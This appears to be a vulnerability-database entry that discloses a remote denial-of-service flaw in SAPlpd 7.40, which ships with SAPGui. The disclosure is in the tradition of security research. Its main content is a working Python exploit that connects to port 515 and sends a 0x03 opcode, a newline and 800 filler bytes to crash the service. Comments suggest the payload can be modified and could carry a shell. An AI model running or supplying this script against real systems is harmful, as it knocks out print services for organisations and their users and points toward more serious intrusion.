SapLPD 7.4.0 Denial Of Service

2017.01.14
Credit: Peter Baris
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: SAPlpd 7.40 Denial of Service # Date: 2016-12-28 # Exploit Author: Peter Baris # Exploit code: http://saptech-erp.com.au/resources/saplpd_dos.zip # Version: 7.40 all patch levels (as a part of SAPGui 7.40) # Tested on: Windows Server 2008 R2 x64, Windows 7 Pro x64 import socket # Opcodes 03h and 04h are vulnerable to bad characters 00h and 0ah # So you can modify the DoS accordingly # The added 800 A's are just to show, that you can deliver a complete shell with the command DoS = ("\x03"+"\x0a"+"\x41"*800) s = socket.socket() s.settimeout(1) s.connect(('192.168.198.132', 515)) print("[*] Crashing SAPlpd 7.40") print("[*] Payload length: "+str(len(DoS))+" bytes") s.send(DoS) s.close()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top